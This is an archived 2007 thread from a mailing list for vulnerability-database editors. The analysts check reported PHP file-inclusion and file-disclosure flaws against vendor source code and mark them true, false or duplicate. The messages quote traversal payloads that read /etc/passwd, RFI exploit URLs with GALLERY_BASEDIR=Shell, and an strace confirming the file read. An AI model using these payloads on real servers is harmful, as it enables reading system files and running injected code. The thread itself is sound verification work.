Message-ID: <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com>

Tested with php5 + fedora works as well.

/str0ke

On 4/26/07, str0ke wrote:
> Tested with php4 + debian latest and worked just fine.
>
> /str0ke
>
> On 4/25/07, George A. Theall wrote:
> > On 04/25/07 21:19, Steven M. Christey wrote:
> >
> > > For PHP anyway, it works like a charm on my Solaris box.
> > >
> > > $feed = "http/../../../test.txt";
> > > if($feed != '' && strpos($feed, 'http') === 0){
> > >     readfile($feed);
> > > }
> > >
> > > (where test.txt is my default directory traversal test file, and the PHP
> > > app's location doesn't have an http subdirectory).
> >
> > Hmmm, I didn't realize Solaris behaved this way.
> >
> > > That said, I vaguely remember running across situations where a
> > > non-existent subdirectory would prevent an attack from working; maybe
> > > there are variations depending on whether realpath() is used or not?
> >
> > I figured it was more of an OS feature; eg, try something like:
> >
> > ls foo/../../../../../ (*nix)
> > dir foo\..\..\..\..\..\..\ (Windows)
> >
> > from a directory not too far off root.
> >
> > Btw, I just tried this on Solaris 10 -- it produced an error rather than
> > a directory listing.
> >
> > George
> > --
> > theall at tenablesecurity.com
> >
>

From theall at tenablesecurity.com Thu Apr 26 14:03:24 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 26 Apr 2007 10:03:24 -0400
Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
In-Reply-To: <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com>
References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com>
Message-ID: <4630B12C.8060005@tenablesecurity.com>

On 04/26/07 09:41, str0ke wrote:

> Tested with php5 + fedora works as well.

Interesting behaviour... it seems to be something special about readfile() as replacing that with, say, include(), reports no such file / directory.

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com Thu Apr 26 14:15:59 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 26 Apr 2007 09:15:59 -0500
Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
In-Reply-To: <4630B12C.8060005@tenablesecurity.com>
References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com> <4630B12C.8060005@tenablesecurity.com>
Message-ID: <814b9d50704260715x766807ban9f37e611e9eb209c@mail.gmail.com>

On 4/26/07, George A. Theall wrote:
> On 04/26/07 09:41, str0ke wrote:
>
> > Tested with php5 + fedora works as well.
>
> Interesting behaviour... it seems to be something special about
> readfile() as replacing that with, say, include(), reports no such file
> / directory.

Yeppers. Seems readfile doesn't care if local directories exist or not.
getcwd("/var/www/html", 4096) = 14 lstat64("/var", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat64("/var/www", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat64("/var/www/html", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat64("/var/www/html/http", 0xbfb47c6c) = -1 ENOENT (No such file or directory) open("/etc/passwd", O_RDONLY) = 3 /str0ke From coley at linus.mitre.org Thu Apr 26 17:43:57 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 26 Apr 2007 13:43:57 -0400 (EDT) Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: <4630B12C.8060005@tenablesecurity.com> References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com> <4630B12C.8060005@tenablesecurity.com> Message-ID: On Thu, 26 Apr 2007, George A. Theall wrote: > Interesting behaviour... it seems to be something special about > readfile() as replacing that with, say, include(), reports no such file > / directory. Yeah, same thing on Solaris - include() fails where readfile() passes. - Steve From gmdarkfig at gmail.com Thu Apr 26 18:39:01 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Thu, 26 Apr 2007 20:39:01 +0200 Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com> <4630B12C.8060005@tenablesecurity.com> Message-ID: I think these functions do something like this: - If $array[$x] == '..' and $array[$x-1] != .. then replace '/../' by ''. So readfile('xd/../yuh/../hello.php); is the same as readfile('hello.php'); > > Interesting behaviour... 
> > it seems to be something special about
> > readfile() as replacing that with, say, include(), reports no such file
> > / directory.

For me, with include() I have the same results (Windows):

C:\Documents and Settings\root\Desktop>cat a.php

C:\Documents and Settings\root\Desktop>cat c:/file.php

From jericho at attrition.org Thu Apr 26 20:22:38 2007
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 26 Apr 2007 20:22:38 +0000 (UTC)
Subject: [VIM] Dup: Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities
In-Reply-To: <4623C487.5050703@tenablesecurity.com>
References: <4623C487.5050703@tenablesecurity.com>
Message-ID:

: The issues covered by Milw0rm 3743 / Bugtraq 23502 are a subset of those
: posted back in 2002 by avart at gmx.de; eg,
:
: http://archives.neohapsis.com/archives/bugtraq/2002-07/0471.html
:
: and covered by CVE-2002-1412 / Bugtraq 5375. Or am I missing something?

back when most of us called it 'command execution' and hadn't started commonly calling this RFI =)

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-1412

Gallery photo album package before 1.3.1 allows local and possibly remote attackers to execute arbitrary code via a modified GALLERY_BASEDIR variable that points to a directory or URL that contains a Trojan horse init.php script.

(the associated mail list post shows the RFI vuln in captionator.php and references the vendor fix for errors/configmode.php, errors/needinit.php, errors/reconfigure.php, errors/unconfigured.php.)

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-2123

PHP remote file inclusion vulnerability in publish_xp_docs.php for Gallery 1.3.2 allows remote attackers to inject arbitrary PHP code by specifying a URL to an init.php file in the GALLERY_BASEDIR parameter.
http://www.securityfocus.com/bid/23502/exploit

http://www.example.com/errors/needinit.php?GALLERY_BASEDIR=Shell
http://www.example.com/errors/reconfigure.php?GALLERY_BASEDIR=Shell
http://www.example.com/errors/unconfigured.php?GALLERY_BASEDIR=Shell
http://www.example.com/errors/configmode.php?GALLERY_BASEDIR=Shell

(the four vendor mentioned files)

http://milw0rm.com/exploits/3743

# Exploit:[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell

(the four vendor mentioned files)

--

So, the CVE above isn't necessarily a dupe as it doesn't mention the vulnerable files. If the CVE is expanded/overhauled, I'd guess they will change it to mention the four files as well as the example RFI vuln in the original disclosure, but it seems they could just as easily add it to 2002-2123?

From jericho at attrition.org Thu Apr 26 21:08:44 2007
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 26 Apr 2007 21:08:44 +0000 (UTC)
Subject: [VIM] False: Joomla/Mambo Jambook v1.0 beta7 Rfi Vuln.
In-Reply-To: <46242B2E.7040903@tenablesecurity.com>
References: <46242B2E.7040903@tenablesecurity.com>
Message-ID:

: Bugtraq 23509 looks false. It concerns a remote file include flaw in a
: third-party component for Mambo / Joomla called Jambook. I installed 1.0
: beta7, which crazy_king claims is affected. Here's the code in
: 'components/com_jambook/jambook.php':

This is also CVE 2007-2196, and the original disclosure is from bugtraq:
http://archives.neohapsis.com/archives/bugtraq/2007-04/0239.html

From coley at mitre.org Thu Apr 26 23:24:18 2007
From: coley at mitre.org (Steven M.
Christey)
Date: Thu, 26 Apr 2007 19:24:18 -0400 (EDT)
Subject: [VIM] true: 2 distinct LMS RFI, one old, one new; and vague ACK
Message-ID: <200704262324.l3QNOIdi007861@faron.mitre.org>

== RFI 1 ==

Researcher: InyeXion
Ref: BUGTRAQ lms 1.5.3 Remote File Inclusion
http://archives.neohapsis.com/archives/bugtraq/2007-04/0379.html

This is a 2-year-old version. I grabbed it:
http://www.lms.org.pl/download/1.5/lms-1.5.3+libs.tar.gz

and the first executable line is as stated:

include($_LIB_DIR.'/multipart_mime_email.php');

This line does not appear in later versions:

./lms-1.6.8/modules/rtmessageadd.php
./lms-1.6.9/modules/rtmessageadd.php
./lms-1.8.9/modules/rtmessageadd.php

== RFI 2 ==

Researcher: Kacper
Ref: http://www.milw0rm.com/exploits/3545

For version 1.8.9:

The first lines in welcome.php are:

require_once($_LIB_DIR.'/Sysinfo.class.php');
@include($_LIB_DIR.'/locale/'.$_language.'/fortunes.php');

the only line in userpanel.php is:

include($CONFIG['directories']['userpanel_dir']."/lib/LMS.setup.php");

== Vendor ACK of... something. ==

Vendor changelog is at http://www.lms.org.pl/changelog.php

ChangeLog,v 1.1115 2007/04/24 has:

version ? (????-??-??):
...
fixed some remote file inclusion vulnerabilities when register_globals is enabled (alec)

But since the vulnerable 1.8.9 is the latest available version, it's not provable that the vendor is talking about RFI 2, instead of some other issue.

- Steve

From coley at mitre.org Thu Apr 26 23:51:16 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 26 Apr 2007 19:51:16 -0400 (EDT)
Subject: [VIM] researcher "alijsb"
Message-ID: <200704262351.l3QNpGDF008493@faron.mitre.org>

alijsb has been posting to Bugtraq a lot lately. I've tried investigating a couple claims and run into dead ends - vendor URLs that don't seem related to the product, vendor URLs that don't exist, etc.

Has anybody done any closer investigations?
- Steve

From jericho at attrition.org Fri Apr 27 00:05:05 2007
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 27 Apr 2007 00:05:05 +0000 (UTC)
Subject: [VIM] Apache AXIS Non-Existent Java Web Service Path Disclosure?
Message-ID:

Watchfire's Appscan product looks for this vulnerability (not sure what they officially title it, the title above is my own), but I can't find any reference to it. Google finds a lot of indirect references suggesting it is common knowledge to the folks who use the product. Has anyone seen this before or have a reference?

----------

Requesting this URL will generate the error message:

http://[target]/axis/tt_pm4l.jws?wsdl

AXIS error

Sorry, something seems to have gone wrong... here are the details:

Fault - java.io.FileNotFoundException: c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory)

AxisFault
 faultCode: {http://xml.apache.org/axis/}Server.userException
 faultString: java.io.FileNotFoundException: c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory)
 faultActor: null
 faultDetail:
 stackTrace: java.io.FileNotFoundException: c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory)

[SNIP]

From str0ke at milw0rm.com Fri Apr 27 05:56:03 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 27 Apr 2007 00:56:03 -0500
Subject: [VIM] researcher "alijsb"
In-Reply-To: <200704262351.l3QNpGDF008493@faron.mitre.org>
References: <200704262351.l3QNpGDF008493@faron.mitre.org>
Message-ID: <814b9d50704262256o3bdb7fc4n108374cd2ea6492a@mail.gmail.com>

Nopers. Once I saw the products didn't match up I just stopped going over them :)

/str0ke

On 4/26/07, Steven M. Christey wrote:
>
> alijsb has been posting to Bugtraq a lot lately. I've tried
> investigating a couple claims and run into dead ends - vendor URLs
> that don't seem related to the product, vendor URLs that don't exist,
> etc.
>
> Has anybody done any closer investigations?
>
> - Steve
>

From heinbockel at mitre.org Fri Apr 27 14:00:42 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Fri, 27 Apr 2007 10:00:42 -0400
Subject: [VIM] FALSE -> PHP Point of Sale (osCommerce) LFI
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01C6B1E5@IMCSRV5.MITRE.ORG>

From a BUGTRAQ posting last month,

PHP Point Of Sale for osCommerce <= (index.php) Remote File Include Vuln
http://marc.info/?l=bugtraq&m=117399405001938&w=2

In index.php:
> session_start();
> include ("settings.php");
> include ("language/$cfg_language");

From the download, settings.php exists, but is empty.

According to the readme.txt file, the user is supposed to install the application via install/index.php. Here, the user is prompted to select their language, which is passed to install/installer.php.

In installer.php:
> $language=$_POST['language'];
>
> $info="
> \$cfg_language=\"$language\";
>
> ?>";
> $open = fopen( "../settings.php", "w+" ) or die ( "Operation Failed!" );
> fputs( $open, "$info" );
> fclose( $open );
>
>
> include("../settings.php");
> include("../language/$cfg_language");

So, this is no issue if the user follows the installation instructions.

William Heinbockel
Infosec Engineer, Sr.
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From heinbockel at mitre.org Fri Apr 27 14:14:51 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Fri, 27 Apr 2007 10:14:51 -0400
Subject: [VIM] FALSE -> 2bgal RFI
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01C6B1F3@IMCSRV5.MITRE.ORG>

Another dispute of Born To K!LL:

BUGTRAQ:20070331 2BGal 3.1.1 <= (admin/index.php) Remote File Include Vulnerability
http://marc.info/?l=bugtraq&m=117552845904509&w=2
CVE-2007-1852

The lang_filename parameter is defined the line above where it is used in both index.php and backupdb.inc.php.
In admin/index.php (line 73-74):
> $lang_filename = "lang/".$lang."/index.inc.php";
> require($lang_filename);

*****************************************************************

In admin/backupdb.inc.php:

line 17-18:
> // security #1: no direct call of the file
> if (!defined('STAYONINCLUDE')) {exit;}

line 28-29:
> $lang_filename = "lang/".$lang."/backupdb.inc.php";
> require($lang_filename);

William Heinbockel
Infosec Engineer, Sr.
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From heinbockel at mitre.org Fri Apr 27 15:07:52 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Fri, 27 Apr 2007 11:07:52 -0400
Subject: [VIM] What the *#$(! -- b2evolution RFI [False]
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01C6B21D@IMCSRV5.MITRE.ORG>

From s433d: Remote File Inclusion
http://www.securityfocus.com/archive/1/archive/1/466886/100/0/threaded

What is going on with the recent trends of really weird exploits:

b2evolution\blogs/a_noskin.php?require=shell?
b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=
b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=shell

Let's see,
Windows backslashes? CHECK
File names as parameters? CHECK
Empty PoC examples? CHECK
Unverified exploits? CHECKITY CHECK CHECK

What's the real issue? n00b? really bad scripter? clueless "kiddie"? All of the above?

Anyway, on to the Disputes!
From b2evolution 1.9.3 "rainforest" edition:

(1) The inc_path variable is defined in conf/_advanced.php, which is included by conf/_config.php, which is included before all later uses of inc_path in all of the following files:

blogs/a_noskin.php
blogs/a_stub.php
blogs/admin.php
blogs/contact.php
blogs/default.php
blogs/index.php
blogs/multiblogs.php

And he forgot one:
blogs/summary.php - which also includes conf/_config.php before $inc_path

All of the following are also declared in conf/_advanced.php:

(2) $view_path in blogs/admin.php
(3) $control_path.$ctrl_mappings[$ctrl] in blogs/admin.php
    [ctrl_mappings[$ctrl] appears to be checked against a static list]
(4) $skins_path in blogs/contact.php and blogs/multiblogs.php

I'm not even going to bother with debunking the example exploits...

William Heinbockel
Infosec Engineer, Sr.
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From gmdarkfig at gmail.com Sun Apr 29 10:00:53 2007
From: gmdarkfig at gmail.com (GM darkfig)
Date: Sun, 29 Apr 2007 12:00:53 +0200
Subject: [VIM] false: Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability
Message-ID:

Title: Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability
Link: http://www.securityfocus.com/archive/1/467103/30/0/threaded

Quote from the thread:
"Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=../../../etc/passwd"

./modules/file.php:

class file extends module_base
[...]
function download()
[...]
$dbr->query("SELECT f.filepath, f.downloads, h.url FROM {$dbr->p}files f LEFT JOIN {$dbr->p}file_hosts h ON h.hostid=f.hostid WHERE fileid=$this->id");
if ($dbr->numrows() < 1) return showmsg('noresults_badurl');
$a = $dbr->getarray();
[...]
header("Content-Type: application/save");
header("Content-Disposition: attachment; filename=\"$filename\"");
$fh = readfile($a['filepath']);

From steve at vitriol.net Mon Apr 30 20:11:49 2007
From: steve at vitriol.net (Steve Tornio)
Date: Mon, 30 Apr 2007 15:11:49 -0500
Subject: [VIM] iMovie Format String CVE-2007-0646
Message-ID: <46364D85.9000107@vitriol.net>

This CVE references MOAB-30-01-2007, which covered Format String flaws in Help Viewer, Safari, iMovie HD and iPhoto. It also references the Apple Security Update 2007-004, which includes fixes for the Help Viewer and a separate Format String flaw in Installer.

Is there any indication that the flaw fixed in Help Viewer is the same as Safari, iMovie and iPhoto?

Steve
osvdb.org
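The readfile()-versus-include() puzzle in the feed-proxy.php thread above (the strace shows a nonexistent `http` component being cancelled by the `..` that follows it) comes down to lexical versus filesystem path resolution. The Python below is an added illustration, not code from any message in this archive: it models the distinction with os.path.normpath (lexical, like the observed readfile() behaviour) against a strict resolve plus a containment check, the check a download handler should make before reading; the webroot layout is constructed for the demo.

```python
import os
import shutil
import tempfile
from pathlib import Path


def lexical_join(base, relative):
    """Textual join + normalise: '..' cancels the component before it even
    when that component does not exist on disk (what the thread saw)."""
    return os.path.normpath(os.path.join(base, relative))


def safe_path(base, relative):
    """Resolve via the filesystem (strict: every component must exist,
    symlinks followed) and require the result to stay under base.
    Returns the resolved Path, raises ValueError otherwise."""
    base_dir = Path(base).resolve(strict=True)
    try:
        target = (base_dir / relative).resolve(strict=True)
    except OSError as exc:  # missing component, dangling symlink, ...
        raise ValueError(f"cannot resolve {relative!r}: {exc}") from None
    if target != base_dir and base_dir not in target.parents:
        raise ValueError(f"{relative!r} escapes {base_dir}")
    return target


def demo():
    """Constructed layout: <tmp>/webroot/hello.txt is served,
    <tmp>/secret.txt lies outside. Returns file text per request,
    or None where safe_path() refused the request."""
    root = Path(tempfile.mkdtemp())
    try:
        web = root / "webroot"
        (web / "real").mkdir(parents=True)
        (web / "hello.txt").write_text("ok")
        (root / "secret.txt").write_text("outside")
        results = {}
        for rel in ("hello.txt",
                    "http/../../secret.txt",   # 'http' missing: strict resolve fails
                    "real/../../secret.txt"):  # 'real' exists: containment fails
            try:
                results[rel] = safe_path(web, rel).read_text()
            except ValueError:
                results[rel] = None
        return results
    finally:
        shutil.rmtree(root)
```

lexical_join("/var/www/html", "http/../../../../etc/passwd") reproduces the strace outcome ("/etc/passwd") with no lstat ever failing, which is exactly why a lexical normalise is not a security check.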